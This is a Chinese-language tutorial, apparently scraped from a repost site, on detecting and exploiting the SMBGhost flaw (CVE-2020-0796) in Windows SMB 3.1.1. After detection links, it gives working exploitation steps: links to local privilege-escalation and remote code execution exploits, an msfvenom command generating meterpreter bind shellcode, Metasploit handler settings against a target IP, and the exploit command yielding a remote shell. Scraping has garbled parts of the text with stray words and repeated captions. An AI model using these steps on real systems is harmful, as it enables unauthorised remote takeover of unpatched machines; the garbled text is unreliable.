CVE-2020-0796 漏洞檢測及利用工具

0x01漏洞描述

2020年3月12日,微軟正式發佈CVE-2020-0796高危漏洞補丁,目前,遠程利用poc代碼已公佈,本文介紹cve-2020-0796漏洞的檢測及利用,來協助你們對未修復的漏洞檢測和防護。漏洞公告顯示,SMB 3.1.1協議中處理壓縮消息時,對其中數據沒有通過安全檢查,直接使用會引起內存破壞漏洞,可能被者利用遠程執行任意代碼。者利用該漏洞無須權限便可實現遠程代碼執行,受**的目標系統只需開機在線便可能被***。python

0x02 影響版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)git

0x03 漏洞檢測

腳本檢測
https://github.com/ollypwn/SMBGhost
檢測返回的smb的版本,這種檢測方式存在必定的誤報
CVE-2020-0796 漏洞檢測及利用工具
CVE-2020-0796 漏洞檢測及利用工具github

能夠發現檢測出存在該漏洞
https://github.com/joaozietolie/CVE-2020-0796-Checker
利用nmap腳本檢測方式檢測
CVE-2020-0796 漏洞檢測及利用工具
CVE-2020-0796 漏洞檢測及利用工具shell

奇安信檢測工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
CVE-2020-0796 漏洞檢測及利用工具windows

0X04漏洞利用

本地提權
https://github.com/danigargu/CVE-2020-0796
本地普通權限用戶經過exp提權後,成功的獲取了系統的system權限
CVE-2020-0796 漏洞檢測及利用工具
遠程poc利用
https://github.com/chompie1337/SMBGhost_RCE_PoC
首先下載遠程利用poc
CVE-2020-0796 漏洞檢測及利用工具
利用msf生成shellcode安全

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

CVE-2020-0796 漏洞檢測及利用工具
把buf 替換成USER_PAYLOAD
CVE-2020-0796 漏洞檢測及利用工具
開啓msf監聽tcp

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.10.183
run

CVE-2020-0796 漏洞檢測及利用工具
運行exp
python3 exploit.py -ip 192.168.10.183
CVE-2020-0796 漏洞檢測及利用工具
能夠看到咱們返回了一個meterpreteride

免責申明:    
本項目僅進行信息蒐集,漏洞探測工做,無漏洞利用、***性行爲,發文初衷爲僅爲方便安全人員對受權項目完成測試工做和學習交流使用。       請使用者遵照當地相關法律,勿用於非受權測試,勿用於非受權測試,勿用於非受權測試(重要的事情說三遍),如做他用所承受的法律責任一律與東塔安全學院無關!!!工具

相關文章
相關標籤/搜索